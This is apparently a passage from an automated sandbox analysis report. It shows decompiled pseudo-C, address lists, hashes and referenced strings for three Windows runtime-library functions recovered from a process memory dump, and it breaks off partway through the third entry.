Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
Instruction ID: 0a3c40c3745b0caa42dba7d4cc9d4065653a9ef8da168e0560561854f43ed006
Opcode Fuzzy Hash: fe3187eee5fd00f120956a44b04921db18ae38cc26305936d718e6765e634537
Instruction Fuzzy Hash: F4C19EB1D40219DBDB25DFA8D885BAEFBF9FF48750F484029E601AB251DB34A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 017EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E017EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E017CEEF0(0x18a7b60);
					_t134 =  *0x18a7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x18a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x18a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E017C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01858938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E017BB150();
													}
													_t116 = E01856D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x18a8638; // 0x0
																	_t122 = L017C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L017EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E017EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E017EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E017EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E017EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E017EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x18a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x18a7b84 = _t75;
						_t73 = E017CEB70(_t134, 0x18a7b60);
						if( *0x18a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017CFF60( *0x18a7b20);
							}
						}
						goto L5;
					}
				}
			}

0x017efab0
0x017efab2
0x017efab3
0x017efab4
0x017efabc
0x017efac0
0x017efb14
0x017efb17
0x017efac2
0x017efac8
0x017efacd
0x017efad3
0x017efad3
0x017efadd
0x017efb18
0x017efb1b
0x017efb1d
0x017efb1e
0x017efb1f
0x017efb20
0x017efb21
0x017efb22
0x017efb23
0x017efb24
0x017efb25
0x017efb26
0x017efb27
0x017efb28
0x017efb29
0x017efb2a
0x017efb2b
0x017efb2c
0x017efb2d
0x017efb2e
0x017efb2f
0x017efb3a
0x017efb3b
0x017efb3e
0x017efb41
0x017efb44
0x017efb47
0x017efb4a
0x017efb4d
0x017efb53
0x0182bdcb
0x0182bdcb
0x017efb59
0x017efb5b
0x017efb5b
0x017efb5e
0x0182bdd5
0x0182bdd8
0x00000000
0x0182bdda
0x00000000
0x0182bdda
0x017efb64
0x017efb64
0x017efb64
0x017efb67
0x017efb6e
0x017efb70
0x017efb72
0x00000000
0x017efb78
0x017efb7a
0x017efb7a
0x017efb7d
0x017efb80
0x0182bddf
0x0182bde1
0x00000000
0x0182bde3
0x00000000
0x0182bde3
0x017efb86
0x017efb86
0x017efb86
0x017efb8b
0x017efb90
0x017efb92
0x017efb94
0x017efb9a
0x017efb9b
0x017efba1
0x0182bde8
0x0182bdeb
0x0182bded
0x0182beb5
0x0182beb5
0x0182bebb
0x0182bebd
0x0182bec3
0x0182bed2
0x0182bedd
0x0182bedd
0x0182beed
0x00000000
0x0182bdf3
0x0182bdfe
0x0182be06
0x0182be0b
0x0182be0d
0x0182be0f
0x0182be14
0x0182be19
0x0182be20
0x0182be25
0x0182be27
0x0182be35
0x0182be39
0x0182be46
0x0182be4f
0x0182be54
0x0182be56
0x0182bef8
0x0182bef8
0x00000000
0x0182be5c
0x0182be5c
0x0182be60
0x00000000
0x0182be66
0x0182be66
0x0182be7f
0x0182be84
0x0182be87
0x0182be89
0x0182be8b
0x0182be99
0x0182be9d
0x0182bea0
0x0182beac
0x0182beaf
0x0182beb1
0x0182beb3
0x0182beb3
0x00000000
0x0182bea2
0x0182bea2
0x00000000
0x0182bea2
0x0182be8d
0x0182be8d
0x0182be92
0x00000000
0x0182be92
0x0182be8b
0x0182be60
0x0182be3b
0x0182be3b
0x0182be3e
0x00000000
0x0182be40
0x0182be40
0x0182be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0182be44
0x0182be3e
0x0182be29
0x0182be29
0x00000000
0x0182be29
0x0182be27
0x00000000
0x017efba7
0x017efba7
0x017efbab
0x0182bf02
0x017efbb1
0x017efbb1
0x017efbb8
0x017efbbd
0x017efbbd
0x017efbbf
0x017efbbf
0x017efbc5
0x017efbcb
0x017efbf8
0x017efbf8
0x017efbfa
0x00000000
0x017efc00
0x017efc00
0x017efc03
0x00000000
0x017efc09
0x017efc09
0x017efc0f
0x017efc15
0x017efc23
0x017efc23
0x017efc25
0x017efc27
0x017efc75
0x017efc7c
0x017efc84
0x00000000
0x017efc29
0x017efc29
0x017efc2d
0x017efc30
0x0182bf0f
0x00000000
0x017efc36
0x017efc38
0x017efc3b
0x017efc41
0x0182bf17
0x0182bf19
0x0182bf48
0x0182bf4b
0x00000000
0x0182bf1b
0x0182bf22
0x0182bf24
0x0182bf26
0x00000000
0x0182bf2c
0x0182bf37
0x0182bf39
0x0182bf3b
0x00000000
0x0182bf41
0x0182bf41
0x0182bf41
0x0182bf41
0x0182bf45
0x00000000
0x0182bf45
0x0182bf3b
0x0182bf26
0x00000000
0x017efc47
0x017efc47
0x017efc49
0x017efcb2
0x017efcb4
0x017efcb6
0x017efcdc
0x017efcdc
0x00000000
0x017efcb8
0x017efcc3
0x017efcc5
0x017efcc7
0x00000000
0x017efcc9
0x017efcc9
0x017efccd
0x00000000
0x017efccd
0x017efcc7
0x00000000
0x017efc4b
0x017efc4b
0x017efc4e
0x017efc4e
0x017efc51
0x017efc51
0x017efc54
0x017efc5a
0x017efc5c
0x017efc5f
0x017efc61
0x017efc63
0x017efc65
0x017efc67
0x017efc6e
0x017efc72
0x017efc72
0x017efc72
0x017efc72
0x017efc67
0x017efc61
0x00000000
0x017efc5a
0x017efc49
0x017efc41
0x017efc30
0x017efc27
0x017efc03
0x017efbcd
0x017efbd3
0x017efbd9
0x017efbdc
0x017efbde
0x017efc99
0x017efc9b
0x017efc9d
0x017efcd5
0x017efcd5
0x017efc89
0x017efc89
0x00000000
0x017efc9f
0x017efc9f
0x017efca3
0x00000000
0x017efca3
0x00000000
0x017efbe4
0x017efbe4
0x017efbe4
0x017efbe4
0x017efbe9
0x017efbf2
0x00000000
0x017efbf2
0x017efbde
0x017efbcb
0x017efbab
0x017efc8b
0x017efc8b
0x017efc8c
0x017efb80
0x017efb72
0x017efb5e
0x017efc8d
0x017efc91
0x017efadf
0x017efadf
0x017efae1
0x017efae4
0x017efae7
0x017efaec
0x017efaf8
0x017efb00
0x017efb07
0x017efb0f
0x017efb0f
0x017efb07
0x00000000
0x017efaf8
0x017efadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0182BE0F

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
Instruction ID: 08249bcc81e9be563ee7e32b974bc71c05e5311a82c140dd706a3e2e9a2bd6ac
Opcode Fuzzy Hash: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
Instruction Fuzzy Hash: 2EA14871B016168BEB26CF6CC458BBAF7E5AF4C710F14456DDA06CBA91EB30D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E017B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x18a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x18a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017F97C0();
				}
				if( *0x18a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E017E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E017D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0184FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E017EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0180DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x18a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x18a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E017D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E017D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01837016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0184FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x18a5350;
							if(_t109 != 0x18a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0184FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01845720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x017b2d8a
0x017b2d8a
0x017b2d92
0x017b2d96
0x017b2d9e
0x017b2da0
0x017b2da3
0x017b2da5
0x017b2da8
0x017b2dab
0x017b2db2
0x0180f9aa
0x0180f9ab
0x0180f9ae
0x0180f9ae
0x017b2db8
0x017b2dc2
0x0180f9b9
0x0180f9be
0x0180f9bf
0x0180f9bf
0x017b2dcf
0x0180f9c9
0x017b2dd5
0x017b2dd5
0x017b2dd5
0x017b2dde
0x017b2de1
0x017b2e70
0x017b2e72
0x017b2e72
0x017b2de7
0x017b2deb
0x017b2e7c
0x017b2e83
0x017b2e85
0x017b2e8b
0x017b2e8d
0x017b2e92
0x017b2e92
0x017b2e85
0x017b2df1
0x017b2df7
0x017b2df9
0x017b2df9
0x017b2dfc
0x017b2dff
0x017b2e02
0x00000000
0x017b2e05
0x017b2e0c
0x0180f9d9
0x017b2e12
0x017b2e12
0x017b2e12
0x017b2e1a
0x0180f9e3
0x0180f9e9
0x0180f9f0
0x0180f9f6
0x0180f9f8
0x0180f9f8
0x0180f9f0
0x017b2e23
0x0180fa02
0x0180fa03
0x0180fa05
0x0180fa06
0x00000000
0x017b2e29
0x017b2e29
0x017b2e2e
0x017b2e34
0x017b2e3e
0x00000000
0x00000000
0x017b2e44
0x017b2e47
0x017b2e4d
0x00000000
0x00000000
0x017b2e4f
0x017b2e54
0x00000000
0x00000000
0x017b2e5a
0x017b2e5f
0x017b2e9a
0x017b2ea4
0x017b2ea5
0x017b2ea8
0x017b2eaf
0x017b2eb2
0x017b2eb5
0x0180fae9
0x0180faeb
0x0180faed
0x0180faef
0x0180faf7
0x0180faf8
0x0180fafd
0x0180faff
0x0180fb04
0x0180fb04
0x0180faff
0x017b2ec0
0x017b2ec4
0x017b2ec6
0x017b2ec8
0x0180fb14
0x0180fb18
0x0180fb1e
0x0180fb21
0x0180fb21
0x017b2ece
0x017b2ece
0x017b2ece
0x017b2ed7
0x017b2e61
0x017b2e63
0x0180fa6b
0x0180fa71
0x0180fa76
0x0180fa78
0x0180fa8a
0x0180fa7a
0x0180fa83
0x0180fa83
0x0180fa8f
0x0180fa91
0x0180fa97
0x0180fa9d
0x0180faa4
0x0180faaa
0x0180faaf
0x0180fab1
0x0180fac3
0x0180fab3
0x0180fabc
0x0180fabc
0x0180fac8
0x0180facb
0x0180fadf
0x0180fadf
0x0180facb
0x0180faa4
0x0180fa91
0x017b2e6f
0x017b2e6f
0x017b2e5f
0x0180fa13
0x0180fa15
0x0180fa17
0x0180fa1f
0x0180fa21
0x0180fa22
0x0180fa25
0x0180fa28
0x0180fa2f
0x0180fa2f
0x0180fa2a
0x0180fa2a
0x0180fa2a
0x0180fa31
0x0180fa34
0x0180fa36
0x0180fa3c
0x0180fa3e
0x0180fa41
0x0180fa43
0x0180fa45
0x0180fa45
0x0180fa41
0x0180fa3c
0x0180fa4a
0x0180fa4f
0x0180fa51
0x0180fa53
0x0180fa56
0x0180fa5b
0x0180fa5e
0x00000000
0x0180fa5e
0x017b2e23

Strings

RTL: Re-Waiting, xrefs: 0180FA4A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
Instruction ID: 498ce3847208f577461d3ff0315e0759879e5dadf4694de996232876eb13ea7f
Opcode Fuzzy Hash: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
Instruction Fuzzy Hash: 12612831A016099FEB33DF6CC888BBEB7A4EB44714F144699E611D72C2C734AA81C791

Uniqueness

Uniqueness Score: -1.00%

Function 01880EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01880EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0187FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01881074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E017F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0187A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0187A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x18a8b04 >> 0x14) + (_v44 -  *0x18a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E017D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0187138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E017D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0186FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x18a8724 & 0x00000008) != 0) {
						E018752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018815B5(0x18a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01880eb7
0x01880eb9
0x01880ec0
0x01880ec2
0x01880ecd
0x0188105b
0x0188105b
0x01881061
0x01881066
0x01881066
0x0188106b
0x01881073
0x01881073
0x01880ed3
0x01880ed6
0x01880edc
0x01880ee0
0x01880ee7
0x01880ef0
0x01880ef5
0x01880efa
0x01880efc
0x01880efd
0x01880f03
0x01880f04
0x01880f06
0x01880f07
0x01880f09
0x01880f0e
0x01880f14
0x01880f23
0x01880f2d
0x01880f34
0x01880f34
0x01880f14
0x01880f52
0x00000000
0x00000000
0x01880f58
0x01880f73
0x01880f74
0x01880f79
0x01880f7d
0x01880f80
0x01880f86
0x01880fab
0x01880fb5
0x01880fc6
0x01880fd1
0x01880fe3
0x01880fd3
0x01880fdc
0x01880fdc
0x01880feb
0x01881009
0x01881009
0x01881015
0x01881027
0x01881017
0x01881020
0x01881020
0x0188102f
0x0188103c
0x0188103c
0x01881048
0x01881050
0x01881050
0x01881055
0x00000000
0x01881055
0x01880f88
0x01880f9e
0x01880fa2
0x01880fa9
0x00000000
0x00000000
0x00000000
0x01880fa9
0x00000000

Strings

`, xrefs: 01880F16

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
Instruction ID: a4207ef6d4ca2431f07848a641391afd23f1d5110b1d369d4c0b1b0ed0427c4c
Opcode Fuzzy Hash: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
